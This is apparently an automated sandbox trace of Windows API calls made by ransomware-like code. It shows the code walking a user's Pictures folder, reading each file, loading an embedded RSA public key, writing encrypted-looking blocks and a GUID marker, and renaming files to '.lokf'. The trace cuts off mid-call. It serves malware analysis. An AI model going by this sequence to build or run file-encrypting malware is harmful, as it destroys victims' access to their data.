RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c830b8 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b388 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83100 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3a0 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3d0 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3e8 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.063] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3e8 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b3d0 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.064] GetCurrentThreadId () returned 0x9e0 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7d9b8 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.064] GetCurrentThreadId () returned 0x9e0 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3d0 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3e8 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3b8 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.066] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1283a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.066] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.066] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.066] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.066] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.066] CloseHandle (hObject=0x5cc) returned 1 [0059.067] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\80aZ2tp21.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\80az2tp21.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\80aZ2tp21.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\80az2tp21.gif.lokf")) returned 1 [0059.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.067] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.068] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60bab670, ftCreationTime.dwHighDateTime=0x1d4d0ee, ftLastAccessTime.dwLowDateTime=0x9b5ef470, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0x9b5ef470, ftLastWriteTime.dwHighDateTime=0x1d4d08b, nFileSizeHigh=0x0, nFileSizeLow=0x16378, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9e3N7.bmp", cAlternateFileName="")) returned 1 [0059.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9e3N7.bmp") returned=".bmp" [0059.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9e3N7.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9e3n7.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.069] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=91000) returned 1 [0059.069] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.071] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.071] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.072] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x16378, lpOverlapped=0x0) returned 1 [0059.072] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.072] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.072] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.073] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.073] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.073] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.073] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.073] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.073] GetLastError () returned 0x0 [0059.073] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.073] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.073] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.074] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.074] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.074] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b400 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b3e8 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.075] GetCurrentThreadId () returned 0x9e0 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7da48 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.075] GetCurrentThreadId () returned 0x9e0 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.076] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16378, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.076] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.076] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.076] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.076] CloseHandle (hObject=0x5cc) returned 1 [0059.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0059.077] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9e3N7.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9e3n7.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9e3N7.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9e3n7.bmp.lokf")) returned 1 [0059.078] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9555cca0, ftCreationTime.dwHighDateTime=0x1d4d538, ftLastAccessTime.dwLowDateTime=0x530dfa50, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x530dfa50, ftLastWriteTime.dwHighDateTime=0x1d4cd5b, nFileSizeHigh=0x0, nFileSizeLow=0x66fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B DJ6bHqinsD9h4.bmp", cAlternateFileName="BDJ6BH~1.BMP")) returned 1 [0059.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.079] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B DJ6bHqinsD9h4.bmp") returned=".bmp" [0059.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B DJ6bHqinsD9h4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b dj6bhqinsd9h4.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.079] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=26364) returned 1 [0059.079] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.081] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x66d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.081] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.082] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x66fc, lpOverlapped=0x0) returned 1 [0059.082] lstrlenA (lpString="-----BEGIN PUBLIC 